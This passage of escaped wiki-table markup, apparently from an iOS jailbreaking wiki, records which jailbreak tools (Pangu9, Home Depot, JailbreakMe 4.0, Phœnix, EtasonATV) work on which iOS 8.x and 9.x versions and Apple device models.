| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC3-RC5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Home Depot]]&lt;br /&gt;
| 1.1 beta 1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;8.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ssh&amp;quot;&amp;gt;1.0.0 and 1.0.1 give SSH access only ([[Cydia]] is not installed).&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipad-wifi&amp;quot;&amp;gt;[[J85mAP|iPad4,7 (Wi-Fi)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Apple TV=====&lt;br /&gt;
'''Note''': &amp;quot;Marketing Version&amp;quot; is the version that the Apple TV reports in its &amp;quot;About&amp;quot; screen.&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Marketing Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J33AP|Apple TV (3rd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 7.0&lt;br /&gt;
| 8.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.1&lt;br /&gt;
| 8.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.2&lt;br /&gt;
| 8.1.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.3&lt;br /&gt;
| 8.1.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.1&lt;br /&gt;
| 8.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.2&lt;br /&gt;
| 8.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.2.1&lt;br /&gt;
| 8.4.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.2.2&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.4.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.3.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.4&lt;br /&gt;
| 8.4.3&lt;br /&gt;
| [[EtasonATV]]&lt;br /&gt;
| RC1&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.5&lt;br /&gt;
| 8.4.4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====9.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;22&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[iPad (3rd generation)]]&lt;br /&gt;
! [[iPad (4th generation)]]&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad Pro (12.9-inch)]]&lt;br /&gt;
! [[iPad Pro (9.7-inch)]]&lt;br /&gt;
! [[iPad mini]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPad mini 3]]&lt;br /&gt;
! [[iPad mini 4]]&lt;br /&gt;
! [[N94AP|iPhone 4S]]&lt;br /&gt;
! [[iPhone 5]]&lt;br /&gt;
! [[iPhone 5c]]&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[N61AP|iPhone 6]]&lt;br /&gt;
! [[N56AP|iPhone 6 Plus]]&lt;br /&gt;
! [[iPhone 6s]]&lt;br /&gt;
! [[iPhone 6s Plus]]&lt;br /&gt;
! [[iPhone SE (1st generation)]]&lt;br /&gt;
! [[iPod touch (5th generation)]]&lt;br /&gt;
! [[N102AP|iPod touch (6th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 9.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu9]] for 9.0-9.1&lt;br /&gt;
| 1.0.0-1.3.2 (Windows)&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0-1.1.1 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 9.0.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu9]] for 9.0-9.1&lt;br /&gt;
| 1.0.0-1.3.2 (Windows)&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0-1.1.1 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 9.0.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu9]] for 9.0-9.1&lt;br /&gt;
| 1.0.0-1.3.2 (Windows)&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.0-1.1.1 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 9.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone52&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu9]] for 9.0-9.1&lt;br /&gt;
| 1.3.0-1.3.2 (Windows)&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.0-1.1.1 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone52&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.2.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad25&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone52&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone53&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.3.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad32&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.3.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad33&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad25&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone52&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 9.3.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad33&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad25&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu9]] for 9.2-9.3.3&lt;br /&gt;
| 1.0.0-1.1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 9.3.4&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Home Depot]]&lt;br /&gt;
| Rev 1 - Rev 7&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;ipad31&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;9.x&amp;quot; name=&amp;quot;iphone53&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| RC1-RC3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[JailbreakMe 4.0]]&lt;br /&gt;
|-&lt;br /&gt;
| 9.3.5&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Phœnix]]&lt;br /&gt;
| v1-v4&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 9.3.6&lt;br /&gt;
| v5&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;9.x&amp;quot;&amp;gt;&lt;br /&gt;
